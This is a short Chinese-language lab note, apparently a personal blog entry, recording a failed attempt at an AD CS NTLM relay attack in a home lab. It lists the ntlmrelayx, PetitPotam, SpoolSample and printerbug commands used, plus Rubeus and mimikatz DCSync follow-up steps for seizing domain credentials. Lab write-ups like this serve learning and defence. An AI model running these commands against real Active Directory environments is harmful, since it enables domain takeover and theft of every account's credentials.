ADCS relay攻擊(失敗)
先說說我的環境
攻擊機 192.168.149.139 Kali
DC主機 192.168.149.211 win2012 R2
AD CS 192.168.149.213 win2008 R2
可能是ADCS伺服器不能用win08的吧
先用攻擊機簡單試探一下,看看curl能不能ok,curl 192.168.149.213/certsrv/ -I,然後看看我們的證書,certutil -config - -ping
環境簡單測試沒有問題,現在開始切入正題,始終抓不到,媽的
python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController
ADCS執行
PetitPotam.exe 192.168.149.139 192.168.149.211 1
攻擊成功,然而並沒有彈過來,淦
python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs
kali執行
python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController
ADCS執行
SpoolSample.exe 192.168.149.211 192.168.149.139
kali執行
python3 printerbug.py leecinsy/administrator:[email protected] 192.168.149.139
失敗
python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs
ADCS執行
PetitPotam.exe 192.168.149.139 192.168.149.211 1
失敗
那就先假裝我抓到了,後續的步驟是
Rubeus.exe asktgt /outfile:kirbi /user:DC機器名 /ptt /certificate:<Base64>
lsadump::dcsync /domain:leecinsy.com /all /csv //dcsync攻擊
後續
可能太菜了,最主要是要清楚攻擊的流程和步驟